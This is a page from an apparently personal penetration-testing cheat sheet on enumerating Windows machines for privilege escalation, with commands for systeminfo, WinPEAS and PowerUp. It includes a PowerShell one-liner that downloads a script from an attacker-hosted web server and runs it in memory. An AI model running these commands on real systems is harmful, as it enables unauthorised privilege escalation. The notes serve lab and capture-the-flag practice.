Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Manual Enumeration
  • Automatic Enumeration
  • WinPEAS
  • PowerUp

Was this helpful?

  1. Post Exploitation
  2. Windows
  3. Windows Privilege Escalation

Enumeration

PreviousWindows Privilege EscalationNextJuicyPotato/RottenPotato

Last updated 2 years ago

Was this helpful?

Manual Enumeration

Get OS version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get service pack version:

wmic os get servicepackmajorversion

Automatic Enumeration

WinPEAS

Great Windows privesc enumeration script.

If you transfer the results from running the script to linux, then you can view colourized output with the cat command. Vim doesn't colourize it properly.

To view it with other tools, you have to convert it to UTF-8 first.

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt

After that, you can view it with less (ansi coloured output).

less -R winpeas-utf-8.txt

Caveats:

  • When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with Get-RegistryAutoLogon (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

PowerUp

This may catch some stuff that WinPEAS might not find, like autologon credentials.

Serve the script over HTTP:

python3 -m http.server 80

(From Powershell) load the module into memory:

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');

Invoke all checks:

Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt

Caveats:

If you're running the script on a 64-bit machine, then .

PEASS-ng/winPEAS at master · carlospolop/PEASS-ngGitHub
make sure you're using 64-bit Powershell
Logo